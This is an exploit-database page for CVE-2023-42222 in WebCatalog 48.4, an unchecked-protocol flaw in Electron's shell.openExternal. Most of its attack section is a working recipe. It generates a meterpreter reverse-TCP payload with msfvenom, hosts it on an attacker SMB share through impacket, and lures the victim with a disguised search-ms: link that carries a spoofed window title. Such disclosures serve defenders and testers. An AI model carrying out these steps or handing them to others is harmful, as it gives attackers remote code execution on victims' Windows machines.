Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WebCatalog 48.4 - Arbitrary Protocol Execution

🗓️ 02 Feb 2024 00:00:00Reported by ItsSixtyN3inType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 341 Views

WebCatalog 48.4 Arbitrary Protocol Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		WebCatalog 48.4 Arbitrary Protocol Execution / Code Execution Vulnerability
5 Feb 202400:00
zdt
ATTACKERKB		CVE-2023-42222
28 Sep 202303:15
attackerkb
Circl		CVE-2023-42222
28 Sep 202307:49
circl
CNNVD		WebCatalog Security Vulnerabilities
28 Sep 202300:00
cnnvd
CVE		CVE-2023-42222
28 Sep 202300:00
cve
Cvelist		CVE-2023-42222
28 Sep 202300:00
cvelist
NVD		CVE-2023-42222
28 Sep 202303:15
nvd
OSV		CVE-2023-42222
28 Sep 202303:15
osv
Packet Storm		WebCatalog 48.4 Arbitrary Protocol Execution / Code Execution
2 Feb 202400:00
packetstorm
Prion		Design/Logic Flaw
28 Sep 202303:15
prion
Rows per page
# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution
# Date: 9/27/2023
# Exploit Author: ItsSixtyN3in
# Vendor Homepage: https://webcatalog.io/en/
# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe
# Version: 48.4.0
# Tested on: Windows
# CVE : CVE-2023-42222

Vulnerability summary:
WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.

Exploit details:

-   Create a reverse shell file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe



-   Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)

python3 smbserver.py Tools -smb2support



-   Have the user sync a page with the payload as a renamed link

[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)



Payload:
search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title

Tobias Diehl
Security Consultant
OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300
Pronouns: he/him
e-mail:  [email protected]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Feb 2024 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 3.18.8
EPSS0.04367
webcatalog arbitrary protocol execution javascript required sucuri cloudproxy.
341